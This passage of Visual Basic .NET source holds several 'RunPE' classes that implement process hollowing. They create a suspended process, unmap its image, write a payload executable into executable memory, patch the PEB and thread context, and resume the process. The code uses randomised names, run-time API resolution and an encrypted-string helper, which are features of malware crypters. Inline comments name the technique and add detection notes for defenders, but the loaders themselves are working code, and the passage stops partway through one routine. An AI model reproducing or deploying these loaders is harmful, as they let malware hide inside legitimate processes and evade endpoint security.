X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
<StructLayout(0)> Structure SecurityFlags
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
' DOS header: Magic is compared with 23117 (&H5A4D); Address, the final
' field, is used as the offset of the NT headers.
<StructLayout(0)> Structure DosHeader
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
' NT headers: Signature is compared with 17744 (&H4550).
Structure NtHeaders
Dim Signature As UInt32, File As FileHeader, [Optional] As OptionalHeaders
End Structure
<StructLayout(0)> Structure FileHeader
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
' 32-bit optional header; start reads Address (entry-point RVA by position),
' Image (preferred base), SImage (image size) and SHeaders (header size).
<StructLayout(0)> Structure OptionalHeaders
Public Magic As UInt16, _
Major, Minor As Byte, _
SCode, IData, UData, Address, Code, Data, Image As UInt32, _
SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, _
Version, SImage, SHeaders, Checksum As UInt32, _
Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public CacaCirectory As Caca_Cirectory()
End Structure
<StructLayout(0)> Structure Caca_Cirectory
Dim Address, Size As UInt32
End Structure
' Delegate types for the eight routines that start resolves at run time.
' Names are randomised, but the parameter lists line up one-to-one with the
' static imports in RunPE2.H on this page, which is how an analyst can
' identify them without decrypting the name strings:
'   srhJrsWaVYRcz2Xx  ~ CreateProcess        SRHJrsWaVYRcz2Xx3 ~ ZwUnmapViewOfSection
'   SRHJrsWaVYRcz2Xx0 ~ WriteProcessMemory   SRHJrsWaVYRcz2Xx4 ~ ResumeThread
'   SRHJrsWaVYRcz2Xx1 ~ ReadProcessMemory    SRHJrsWaVYRcz2Xx5 ~ GetThreadContext
'   SRHJrsWaVYRcz2Xx2 ~ VirtualAllocEx       SRHJrsWaVYRcz2Xx6 ~ SetThreadContext
' The pairing of 5 and 6 is presumed from call order in start; their
' signatures are identical. Remote addresses are typed as Integer.
Private Delegate Function srhJrsWaVYRcz2Xx _
(ByVal JO3P0nWH9RI As String, ByVal Ly1PWQU6zs As String, ByRef SggXrcsxs79yrjkO As SecurityFlags, _
ByRef thread As SecurityFlags, _
ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, _
<[In]()> ByRef startup As StartupInformation, <Out()> ByRef info As ProcessInformation) As Boolean
Private Delegate Function SRHJrsWaVYRcz2Xx0 _
(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer, ByVal a1u As Byte(), _
ByVal size As Integer, <Out()> ByRef written As Integer) As Boolean
Private Delegate Function SRHJrsWaVYRcz2Xx1 _
(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer, ByRef a1u As Integer, _
ByVal size As Integer, ByRef read As Integer) As Integer
Private Delegate Function SRHJrsWaVYRcz2Xx2 _
(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer, ByVal size As UInt32, ByVal type As UInt32, _
ByVal protect As UInt32) As IntPtr
Private Delegate Function SRHJrsWaVYRcz2Xx3(ByVal SggXrcsxs79yrjkO As IntPtr, ByVal zfi89Nkg9c As Integer) As Long
Private Delegate Function SRHJrsWaVYRcz2Xx4(ByVal thread As IntPtr) As UInt32
Private Delegate Function SRHJrsWaVYRcz2Xx5(ByVal thread As IntPtr, ByRef context As Context) As Boolean
Private Delegate Function SRHJrsWaVYRcz2Xx6(ByVal thread As IntPtr, ByRef context As Context) As Boolean
End Class
Code:
Public Class RunPE4
' Shared TripleDES and MD5 provider instances used by utDJXA and FeYCUo.
' Both are Public Shared, so state set by FeYCUo (Key, Mode) persists across
' calls and is visible to any code that can see the class.
Public Shared TngIKL As New System.Security.Cryptography.TripleDESCryptoServiceProvider
Public Shared JVTvYd As New System.Security.Cryptography.MD5CryptoServiceProvider
' Returns the MD5 hash of the UTF-8 bytes of cvmPSO. FeYCUo uses the result
' as a TripleDES key.
Public Shared Function utDJXA(ByVal cvmPSO As String) As Byte()
Return JVTvYd.ComputeHash(System.Text.ASCIIEncoding.UTF8.GetBytes(cvmPSO))
End Function
' String de-obfuscation helper: Base64-decodes VmkZwK and decrypts it with
' TripleDES in ECB mode under the MD5 hash of WUUZDv, returning UTF-8 text.
' "On Error Resume Next" suppresses every run-time error in the body, so bad
' input does not raise an exception to the caller.
' Neither this function nor utDJXA is called from the other RunPE4 members
' shown on this page; start passes its library and function names as
' plaintext literals.
Public Shared Function FeYCUo(ByVal VmkZwK As String, ByVal WUUZDv As String) As String
On Error Resume Next
TngIKL.Key = utDJXA(WUUZDv)
TngIKL.Mode = System.Security.Cryptography.CipherMode.ECB
Dim CodnPp() As Byte = Convert.FromBase64String(VmkZwK)
Return System.Text.ASCIIEncoding.UTF8.GetString(TngIKL.CreateDecryptor().TransformFinalBlock(CodnPp, 0, CodnPp.Length))
End Function
' Static imports of LoadLibraryA (bLLRl) and GetProcAddress (ZjzJt). The
' Alias strings keep the real export names in the assembly even though the
' VB identifiers are randomised.
Public Declare Function bLLRl Lib "kernel32" Alias "LoadLibraryA" (ByVal nQDUd As String) As IntPtr
Public Declare Function ZjzJt Lib "kernel32" Alias "GetProcAddress" (ByVal yZhYy As IntPtr, ByVal kBbXD As String) As IntPtr
' Resolves export nEUBm from library PrLlr (LoadLibraryA + GetProcAddress via
' bLLRl/ZjzJt) and wraps the address in a delegate of type T.
' Neither the module handle nor the export address is checked for zero.
Function GyRZJ(Of T)(ByVal PrLlr As String, ByVal nEUBm As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZjzJt(bLLRl(PrLlr), nEUBm), GetType(T)), Object), T)
End Function
' Delegate shapes for the routines resolved at run time. The mapping is taken
' from the GyRZJ calls in PHSNiW and start:
'   XuAAu -> ntdll!NtGetContextThread     FKVqV -> ntdll!NtSetContextThread
'   DTjMp -> ntdll!NtUnmapViewOfSection   nkDaY -> kernel32!VirtualAllocEx
'   NjwCa -> ntdll!NtReadVirtualMemory    vqYMg -> ntdll!NtWriteVirtualMemory
'   VUbTE -> ntdll!NtResumeThread
' Parameter lists are identical to the apii1..apii7 delegates of RunPE1 on
' this page; only the identifiers differ.
Delegate Function XuAAu(ByVal IrRMz As IntPtr, ByVal LmmUty As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function DTjMp(ByVal WbEOKY As IntPtr, ByVal mKoBRn As IntPtr) As UInteger
Delegate Function NjwCa(ByVal gqrpwB As IntPtr, ByVal zQANwZ As IntPtr, ByRef WpXrSU As IntPtr, ByVal QrGSaE As Integer, ByRef JXAcvm As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function VUbTE(ByVal cGlpuj As IntPtr, ByVal FEpIZz As IntPtr) As UInteger
Delegate Function FKVqV(ByVal GBTikA As IntPtr, ByVal uBiyie As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function nkDaY(ByVal hmTQdv As IntPtr, ByVal uqLzDL As IntPtr, ByVal rYBQOc As IntPtr, ByVal qJYtAV As Integer, ByVal akoIiv As Integer) As IntPtr
Delegate Function vqYMg(ByVal MMwICt As IntPtr, ByVal GlmFHM As IntPtr, ByVal TyzwRj As Byte(), ByVal EElRhQ As UInteger, ByVal oNgTng As Integer) As Boolean
' JqXeSe is a static import of CreateProcessW; the real name survives in the
' Alias string.
Public Declare Auto Function JqXeSe Lib "kernel32" Alias "CreateProcessW" (ByVal akCprw As String, ByVal byglKR As StringBuilder, ByVal IKLJVT As IntPtr, ByVal vYdutD As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal PSOFeY As Boolean, ByVal CUoVmk As Integer, ByVal ZwKWUU As IntPtr, ByVal ZDvCod As String, ByVal nPpalH As Byte(), ByVal PhjVkq As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' Reads WnaeIH bytes (default 4) from address tlOnHv in the *current* process
' via ntdll!NtReadVirtualMemory and returns the value as an Integer. start
' uses it to read PE header fields from its own payload buffer.
' The status returned by the native call is ignored.
Private Function PHSNiW(ByVal tlOnHv As Long, Optional ByVal WnaeIH As Long = &H4) As Integer
Dim ADVoiL As IntPtr
Dim XwYNWu As Integer
Dim vtQgoy As NjwCa = GyRZJ(Of NjwCa)("ntdll", "NtReadVirtualMemory")
Call vtQgoy(Process.GetCurrentProcess.Handle, tlOnHv, ADVoiL, WnaeIH, XwYNWu)
Return ADVoiL
End Function
' Process-hollowing routine (MITRE ATT&CK T1055.012). Statement for statement
' it matches RunPE1.start on this page with identifiers renamed: HIntmi is
' the payload PE and NdPPep the command line of the process to start.
' Returns False only on a managed exception; no native return value is
' checked, so True does not show that the steps succeeded.
' Defender view: identifier renaming leaves the plaintext API name strings,
' the numeric constants (4, &H10002, &H3000, &H40, &HF8, 40) and the call
' order intact, so signatures built on those still apply to this variant.
Public Function start(ByVal HIntmi As Byte(), ByVal NdPPep As String) As Boolean
Try
' Pin the payload only long enough to take its address as an Integer.
Dim YbQTMu As GCHandle = GCHandle.Alloc(HIntmi, GCHandleType.Pinned) : Dim hModuleBase As Integer = YbQTMu.AddrOfPinnedObject : YbQTMu.Free()
Dim Mbqzdr As IntPtr = IntPtr.Zero
' zuOjtv receives the process information: (0) is used as the process handle,
' (1) as the thread handle. UETenS is 68 zero bytes of startup info.
Dim zuOjtv As IntPtr() = New IntPtr(3) {}
Dim UETenS As Byte() = New Byte(67) {}
' Offset 60 (&H3C): file offset of the NT headers.
Dim XOjcdb As Integer = BitConverter.ToInt32(HIntmi, 60)
Dim ihEocg As Integer
' x86 thread context as 179 DWORDs; &H10002 requests the integer registers.
Dim WAOlwk As UInteger() = New UInteger(178) {}
WAOlwk(0) = &H10002
' Creation flag 4 = CREATE_SUSPENDED.
JqXeSe(Nothing, New StringBuilder(NdPPep), Mbqzdr, Mbqzdr, False, 4, Mbqzdr, Nothing, UETenS, zuOjtv)
' pRhhQA = address of the payload's NT headers; +&H34 is ImageBase.
Dim pRhhQA As Integer = (hModuleBase + PHSNiW(hModuleBase + &H3C))
ihEocg = PHSNiW(pRhhQA + &H34)
' Unmap the child's memory at the payload's preferred base.
Dim NwZuBi As DTjMp = GyRZJ(Of DTjMp)("ntdll", "NtUnmapViewOfSection")
NwZuBi(zuOjtv(0), ihEocg)
' Allocate SizeOfImage (+&H50) bytes there: &H3000 = MEM_COMMIT Or
' MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Dim yieuqL As nkDaY = GyRZJ(Of nkDaY)("kernel32", "VirtualAllocEx")
Dim zDLGlm As IntPtr = yieuqL(zuOjtv(0), ihEocg, PHSNiW(pRhhQA + &H50), &H3000, &H40)
' FHMrYB and QOcTyz are reassigned inside the loop before they are used.
Dim FHMrYB As New IntPtr(BitConverter.ToInt32(HIntmi, XOjcdb + &H34))
Dim QOcTyz As New IntPtr(BitConverter.ToInt32(HIntmi, XOjcdb + 80))
Dim wRjakC As Integer
Dim prwWpX As Integer
' Write the PE headers (SizeOfHeaders, +&H54) to the new allocation.
Dim rSUqJY As vqYMg = GyRZJ(Of vqYMg)("ntdll", "NtWriteVirtualMemory")
rSUqJY(zuOjtv(0), zDLGlm, HIntmi, CUInt(CInt(PHSNiW(pRhhQA + &H54))), wRjakC)
' One pass per section (count at +&H6). In each 40-byte header read as ten
' Int32 values, index 3 is VirtualAddress, 4 SizeOfRawData, 5 PointerToRawData.
For i = 0 To PHSNiW(pRhhQA + &H6, 2) - 1
Dim tAVEEl As Integer() = New Integer(9) {}
Buffer.BlockCopy(HIntmi, (XOjcdb + &HF8) + (i * 40), tAVEEl, 0, 40)
Dim RhQbyg As Byte() = New Byte((tAVEEl(4) - 1)) {}
Buffer.BlockCopy(HIntmi, tAVEEl(5), RhQbyg, 0, RhQbyg.Length)
QOcTyz = New IntPtr(zDLGlm.ToInt32() + tAVEEl(3))
FHMrYB = New IntPtr(RhQbyg.Length)
rSUqJY(zuOjtv(0), QOcTyz, RhQbyg, CUInt(FHMrYB), prwWpX)
Next i
' Index 41 of the context array is Ebx; Ebx + 8 receives the new image base.
Dim lKRQrG As XuAAu = GyRZJ(Of XuAAu)("ntdll", "NtGetContextThread")
lKRQrG(zuOjtv(1), WAOlwk)
rSUqJY(zuOjtv(0), WAOlwk(41) + &H8, BitConverter.GetBytes(zDLGlm.ToInt32()), CUInt(&H4), prwWpX)
' Index &H2C (44) is Eax: ImageBase + AddressOfEntryPoint (+&H28).
WAOlwk(&H2C) = ihEocg + PHSNiW(pRhhQA + &H28)
Dim SaEako As FKVqV = GyRZJ(Of FKVqV)("ntdll", "NtSetContextThread")
SaEako(zuOjtv(1), WAOlwk)
' Resume the primary thread of the child.
Dim IivoNg As VUbTE = GyRZJ(Of VUbTE)("ntdll", "NtResumeThread")
IivoNg(zuOjtv(1), 0)
Catch ex As Exception
' Any managed exception is swallowed and reported only as False.
Return False
End Try
Return True
End Function
End Class
Code:
Class RunPE5
#Region "Static API Calls"
' The only two static imports of RunPE5; every other native routine is bound
' at run time through CreateApi.
Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
#End Region
#Region "Dynamic API Caller"
' Resolves export Method from library Name with LoadLibraryA + GetProcAddress
' and wraps the address in a delegate of type T.
' Neither the module handle nor the export address is checked for zero.
Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
End Function
#End Region
#Region "Dynamic API's"
' Delegate types and the instance fields that hold the resolved routines.
' Each field initialiser calls CreateApi, so the lookups run whenever a
' RunPE5 instance is constructed, before start is called.
' The library and function names are plaintext literals: ReadProcessMemory,
' CreateProcessA, NtQueryInformationProcess, IsWow64Process,
' WriteProcessMemory, NtUnmapViewOfSection, VirtualAllocEx and ResumeThread.
' Defender view: that set of literals, next to GetDelegateForFunctionPointer,
' is a compact static indicator for this class.
Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")
Private Delegate Function CreateProcessParameters( _
ByVal ApplicationName As String, _
ByVal CommandLine As String, _
ByVal ProcessAttributes As IntPtr, _
ByVal ThreadAttributes As IntPtr, _
ByVal InheritHandles As Boolean, _
ByVal CreationFlags As UInteger, _
ByVal Environment As IntPtr, _
ByVal CurrentDirectory As String, _
ByRef StartupInfo As STARTUPINFO, _
ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
' Bound to the ANSI export CreateProcessA.
Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")
Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
ByVal ProcessInformationClass As Integer, _
ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
ByVal ProcessInformationLength As UInteger, _
ByRef ReturnLength As UIntPtr) As UInteger
ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")
' Left as Nothing here and not ReadOnly; it is presumably bound later in
' HandleRun, whose body continues beyond the lines shown.
Private Delegate Function GetThreadContext64Parameters( _
ByVal hThread As IntPtr, _
ByRef lpContext As CONTEXT32) As Boolean
Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing
Private Delegate Function IsWow64ProcessParameters( _
ByVal hProcess As IntPtr, _
ByRef Wow64Process As Boolean) As Boolean
ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")
Private Delegate Function WriteProcessMemoryParameters( _
ByVal hProcess As IntPtr, _
ByVal lpBaseAddress As IntPtr, _
ByVal lpBuffer As Byte(), _
ByVal nSize As UInteger, _
ByRef lpNumberOfBytesWritten As UInteger) As Boolean
ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")
Private Delegate Function NtUnmapViewOfSectionParameters( _
ByVal hProcess As IntPtr, _
ByVal pBaseAddress As IntPtr) As UInteger
ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")
Private Delegate Function VirtualAllocExParameters( _
ByVal hProcess As IntPtr, _
ByVal lpAddress As IntPtr, _
ByVal dwSize As UInteger, _
ByVal flAllocationType As UInteger, _
ByVal flProtect As UInteger) As IntPtr
ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")
Private Delegate Function ResumeThreadParameters( _
ByVal hThread As IntPtr) As UInteger
ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")
#End Region
#Region "API Structures"
' Native structures passed to the run-time-resolved routines. Unlike the
' other classes on this page, they keep their Windows SDK names.
' Output of CreateProcess: handles and ids of the new process and thread.
Private Structure PROCESS_INFORMATION
Public hProcess As IntPtr
Public hThread As IntPtr
Public dwProcessId As UInteger
Public dwThreadId As UInteger
End Structure
' Abbreviated startup-info layout. NOTE(review): Misc (36 bytes) appears to
' stand in for the numeric fields between lpTitle and lpReserved2, and
' lpReserved2 is declared as a single Byte - confirm against the SDK
' definition before relying on this layout.
Private Structure STARTUPINFO
Public cb As UInteger
Public lpReserved As String
Public lpDesktop As String
Public lpTitle As String
<Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
Public Misc As Byte()
Public lpReserved2 As Byte
Public hStdInput As IntPtr
Public hStdOutput As IntPtr
Public hStdError As IntPtr
End Structure
' Floating-point save area embedded in CONTEXT32.
Structure FLOATING_SAVE_AREA
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInteger
End Structure
' x86 thread context (flags, debug registers, FP area, segment and
' general-purpose registers, extended registers).
Structure CONTEXT32
Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
Dim FloatSave As FLOATING_SAVE_AREA
Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
<System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
End Structure
' Result buffer for NtQueryInformationProcess; PebBaseAddress is the field
' of interest for locating the target's PEB.
Structure PROCESS_BASIC_INFORMATION
Public ExitStatus As IntPtr
Public PebBaseAddress As IntPtr
Public AffinityMask As IntPtr
Public BasePriority As IntPtr
Public UniqueProcessID As IntPtr
Public InheritedFromUniqueProcessId As IntPtr
End Structure
#End Region
#Region "Injection"
' Public entry point: calls HandleRun with the same arguments up to five times.
' Returns True as soon as one attempt succeeds, False if all five fail.
'   path         - executable to launch as the host process (passed straight to HandleRun)
'   payload      - raw bytes of the image to place into that process
'   creationflag - passed through unchanged to CreateProcess by HandleRun
' Defender note: every failed attempt creates a child process and then kills it (see the Catch block in
' HandleRun), so a failing run shows up as a burst of up to five short-lived children of the same image
' in process-creation telemetry.
Public Function start(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
For I As Integer = 1 To 5
If HandleRun(path, payload, creationflag) Then Return True
Next
Return False
End Function
' One attempt at replacing the image of a newly created process with the supplied payload.
' This is the technique catalogued as process hollowing (MITRE ATT&CK T1055.012).
'   Path         - executable launched via CreateProcess; also passed, wrapped in quotes, as the command line
'   payload      - byte array parsed as a PE file; its header fields are read at fixed offsets with BitConverter
'   creationflag - passed unchanged as the creation flags of CreateProcess
' Returns True when every step succeeded. On any exception the created process is looked up by id and
' killed, and False is returned.
' Steps as visible in the code:
'   1. CreateProcess on Path.
'   2. Locate the target's PEB (thread context Ebx for a WOW64 target seen from a 64-bit caller, otherwise
'      NtQueryInformationProcess) and read the image base pointer stored in it.
'   3. Parse the payload's PE header; unmap the target's original image if it sits at the payload's ImageBase.
'   4. VirtualAllocEx in the target, then WriteProcessMemory for the headers and for each section.
'   5. Write the new image base into the target's PEB and call ResumeThread.
' Defender notes:
'   - The call sequence CreateProcess -> NtUnmapViewOfSection -> VirtualAllocEx -> WriteProcessMemory -> ResumeThread
'     against a child process is what endpoint sensors correlate on for this technique.
'   - The allocation uses &H3000 (MEM_COMMIT Or MEM_RESERVE) with protection &H40 (PAGE_EXECUTE_READWRITE);
'     a remote RWX region that is then written to from another process is a high-signal event on its own.
'   - After this runs, the in-memory image of the child no longer matches its file on disk, which memory
'     forensics can detect by comparing the mapped image with the backing file.
'   - payload is parsed without any bounds or signature checks; out-of-range offsets raise exceptions that the
'     Catch block turns into a False return.
Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
Dim ReadWrite As Integer = Nothing
Dim QuotedPath As String = String.Format("""{0}""", Path)
Dim SI As New STARTUPINFO
Dim PI As New PROCESS_INFORMATION
SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data
Try
'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
' NOTE(review): the creation state is decided by the caller-supplied creationflag; this function does not set it itself.
If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()
'COMMENT: Defines some variables we need in the next process
Dim ProccessInfo As New PROCESS_BASIC_INFORMATION
Dim RetLength As UInteger
Dim Context = Nothing
Dim PEBAddress32 As Integer = Nothing
Dim PEBAddress64 As Int64 = Nothing
Dim TargetIs64 As Boolean = Nothing
Dim IsWow64Proc As Boolean = False
IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
Context = New CONTEXT32
Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
' Debug output left in by the author: prints the Ebx value to the console.
Console.WriteLine(Context.Ebx)
PEBAddress32 = Context.Ebx
TargetIs64 = False
Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here.
NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
PEBAddress32 = ProccessInfo.PebBaseAddress
TargetIs64 = False
End If
Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here.
NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
PEBAddress64 = ProccessInfo.PebBaseAddress
TargetIs64 = True
End If
' Read the image base pointer out of the target's PEB (offset &H10 for a 64-bit target, &H8 for a 32-bit one).
Dim BaseAddress As IntPtr
If TargetIs64 = True Then
ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
Else
ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
End If
' From here on the payload bytes are interpreted as a PE file; all offsets are relative to the PE header
' position stored at &H3C. None of the reads is range-checked.
Dim PayloadIs64 As Boolean = False
Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value
If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
Else : PayloadIs64 = False : End If
If PayloadIs64 = False Then
If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
' Modifies the caller's payload array in place (one byte at PE header offset + &H398).
Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
End If
End If
Dim dwImageBase As Integer
If PayloadIs64 = True Then
dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnecessary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
Else
dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnecessary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
End If
If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
' A non-zero return value from NtUnmapViewOfSection is treated as failure.
If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
End If
Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE: the whole image is allocated as one RWX region.
Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
If dwNewImageBase = 0 Then Throw New Exception()
Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the first dwSizeOfHeaders bytes of the payload (its PE headers) to the target
'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
' Walk the section table (entries are &H28 bytes apart) and copy each section's raw data to
' dwNewImageBase + VirtualAddress in the target. Sections with SizeOfRawData = 0 are skipped.
For I As Integer = 0 To NumberOfSections - 1
Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
If Not SizeOfRawData = 0 Then
Dim SectionData(SizeOfRawData - 1) As Byte
Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
End If
SectionOffset += &H28
Next
' PointerData holds the bytes of dwNewImageBase; it is written back to the same PEB offset that was read earlier.
Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
If TargetIs64 = True Then
If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new image base pointer into the PEB of a 64bit target
Else
If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new image base pointer into the PEB of a 32bit target
End If
